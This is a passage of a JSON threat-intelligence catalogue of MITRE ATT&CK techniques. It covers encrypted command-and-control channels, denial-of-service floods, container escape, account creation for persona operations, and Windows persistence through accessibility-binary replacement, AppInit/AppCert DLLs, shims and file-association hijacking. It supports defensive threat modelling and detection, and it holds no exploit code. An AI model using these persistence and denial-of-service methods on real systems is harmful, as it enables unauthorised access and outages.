"dest-uuid": "9a388756-9de0-45ea-9820-810443733789",
"type": "similar"
},
{
"dest-uuid": "5de59320-1471-4715-99c4-eda2f7996d07",
"type": "similar"
}
],
"uuid": "3569b783-1be5-414b-adb9-42c47ceee1cc",
"value": "Email Collection"
},
{
"description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receivers public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1573.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "ce822cce-f7f1-4753-bff1-12e5bef66d53",
"value": "Asymmetric Cryptography"
},
{
"description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1573.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "ac7b9775-8323-49cb-8fef-3cef972f11ac",
"value": "Symmetric Cryptography"
},
{
"description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "ce822cce-f7f1-4753-bff1-12e5bef66d53",
"type": "similar"
},
{
"dest-uuid": "ac7b9775-8323-49cb-8fef-3cef972f11ac",
"type": "similar"
}
],
"uuid": "0e704680-c930-42a7-9caa-5802b8cb2c48",
"value": "Encrypted Channel"
},
{
"description": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1499.003"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "49ef3482-7b75-4097-b9a6-6c9cb99d865c",
"value": "Application Exhaustion Flood"
},
{
"description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. <sup>[[Sucuri BIND9 August 2015](https://app.tidalcyber.com/references/5e108782-2f32-4704-be01-055d9e767216)]</sup> Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.\n\nAdversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34), [Firmware Corruption](https://app.tidalcyber.com/technique/559c647a-7759-4943-856d-dc717b5a443e), [Service Stop](https://app.tidalcyber.com/technique/e27c5756-f43e-424f-af62-b21e8b304e5d) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1499.004"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "2109de05-5b45-4519-94a2-6c04f7d88286",
"value": "Application or System Exploitation"
},
{
"description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.<sup>[[Cloudflare SynFlood](https://app.tidalcyber.com/references/e292c4fe-ae77-4393-b666-fb6290cb4aa8)]</sup>\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.<sup>[[Corero SYN-ACKflood](https://app.tidalcyber.com/references/ec41de8a-c673-41bf-b713-4a647b135532)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1499.001"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "b05b5092-60f8-4324-aee3-7522753439ac",
"value": "OS Exhaustion Flood"
},
{
"description": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.<sup>[[Cloudflare HTTPflood](https://app.tidalcyber.com/references/1a5934a4-35ce-4f7c-be9c-c1faf4ee0838)]</sup>\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.<sup>[[Arbor SSLDoS April 2012](https://app.tidalcyber.com/references/b5de4376-0deb-45de-83a0-09df98480464)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1499.002"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "03619027-8a54-4cb2-8f1d-38d476edbdd8",
"value": "Service Exhaustion Flood"
},
{
"description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.<sup>[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]</sup>\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).\n",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
},
{
"dest-uuid": "49ef3482-7b75-4097-b9a6-6c9cb99d865c",
"type": "similar"
},
{
"dest-uuid": "2109de05-5b45-4519-94a2-6c04f7d88286",
"type": "similar"
},
{
"dest-uuid": "b05b5092-60f8-4324-aee3-7522753439ac",
"type": "similar"
},
{
"dest-uuid": "03619027-8a54-4cb2-8f1d-38d476edbdd8",
"type": "similar"
}
],
"uuid": "8b0caea0-602e-4117-8322-b125150f5c2a",
"value": "Endpoint Denial of Service"
},
{
"description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.<sup>[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]</sup>\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the hosts filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.<sup>[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)]</sup><sup>[[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)]</sup><sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup><sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup><sup>[[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)]</sup><sup>[[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]</sup>\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://app.tidalcyber.com/technique/0b9609dd-9f19-4747-ba6e-421b6b7ff03f).<sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup> Adversaries may also escape via [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.<sup>[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]</sup>\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.",
"meta": {
"platforms": [
"Containers",
"Linux",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "bebaf25b-9f50-4e3b-96cc-cc55c5765b61",
"value": "Escape to Host"
},
{
"description": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>\n\nCreating [Cloud Accounts](https://app.tidalcyber.com/technique/4c7e52b1-9881-4966-b9b5-d88c5e88d604) may also require adversaries to establish [Email Accounts](https://app.tidalcyber.com/technique/1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb) to register with the cloud provider. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1585.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "4c7e52b1-9881-4966-b9b5-d88c5e88d604",
"value": "Cloud Accounts"
},
{
"description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup> Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.<sup>[[Trend Micro R980 2016](https://app.tidalcyber.com/references/6afd89ba-2f51-4192-82b3-d961cc86adf1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1585.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb",
"value": "Email Accounts"
},
{
"description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1585.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "fe0bf22c-efb2-4bc6-96d8-e0e909502fd7",
"value": "Social Media Accounts"
},
{
"description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "4c7e52b1-9881-4966-b9b5-d88c5e88d604",
"type": "similar"
},
{
"dest-uuid": "1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb",
"type": "similar"
},
{
"dest-uuid": "fe0bf22c-efb2-4bc6-96d8-e0e909502fd7",
"type": "similar"
}
],
"uuid": "9a2d6628-0dd7-4f25-a242-b752fcf47ff4",
"value": "Establish Accounts"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are <code>C:\\Windows\\System32\\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\\Windows\\System32\\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. <sup>[[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]</sup>\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup> The [Image File Execution Options Injection](https://app.tidalcyber.com/technique/91d813d3-c17c-4c4c-b86e-0667f669a2f4) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\\Windows\\System32\\utilman.exe</code>) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the replaced file to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>\n\nOther accessibility features exist that may also be leveraged in a similar fashion: <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup><sup>[[Narrator Accessibility Abuse](https://app.tidalcyber.com/references/fc889ba3-79a5-445a-81ea-dfe81c1cc542)]</sup>\n\n* On-Screen Keyboard: <code>C:\\Windows\\System32\\osk.exe</code>\n* Magnifier: <code>C:\\Windows\\System32\\Magnify.exe</code>\n* Narrator: <code>C:\\Windows\\System32\\Narrator.exe</code>\n* Display Switcher: <code>C:\\Windows\\System32\\DisplaySwitch.exe</code>\n* App Switcher: <code>C:\\Windows\\System32\\AtBroker.exe</code>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.008"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba",
"value": "Accessibility Features"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n\nSimilar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.009"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96",
"value": "AppCert DLLs"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> or <code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. <sup>[[AppInit Registry](https://app.tidalcyber.com/references/dd3f98d9-0228-45a6-9e7b-1babf911a9ac)]</sup> Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. <sup>[[AppInit Secure Boot](https://app.tidalcyber.com/references/2b951be3-5105-4665-972f-7809c057fd3f)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.010"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f",
"value": "AppInit DLLs"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* <code>%WINDIR%\\AppPatch\\sysmain.sdb</code> and\n* <code>hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb</code>\n\nCustom databases are stored in:\n\n* <code>%WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom</code> and\n* <code>hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom</code>\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. <sup>[[FireEye Application Shimming](https://app.tidalcyber.com/references/658c8dd6-1a6a-40f0-a7b5-286fd4b1985d)]</sup> Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.011"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829",
"value": "Application Shimming"
},
{
"description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.<sup>[[Microsoft Change Default Programs](https://app.tidalcyber.com/references/de515277-a280-40e5-ba34-3e8f16a5c703)]</sup><sup>[[Microsoft File Handlers](https://app.tidalcyber.com/references/cc12cd2c-4f41-4d7b-902d-53c35eb41210)]</sup><sup>[[Microsoft Assoc Oct 2017](https://app.tidalcyber.com/references/63fb65d7-6423-42de-b868-37fbc2bc133d)]</sup> Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under <code>HKEY_CLASSES_ROOT\\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\\\\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command</code>. For example: \n\n* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command</code>\n* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command</code>\n* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command</code>\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.<sup>[[TrendMicro TROJ-FAKEAV OCT 2012](https://app.tidalcyber.com/references/5d9e974f-07f8-48e4-96b6-632ecb31465d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "9cfbe3ba-957e-49fd-9494-9870e5d0ae16",
"value": "Change Default File Association"
},
{
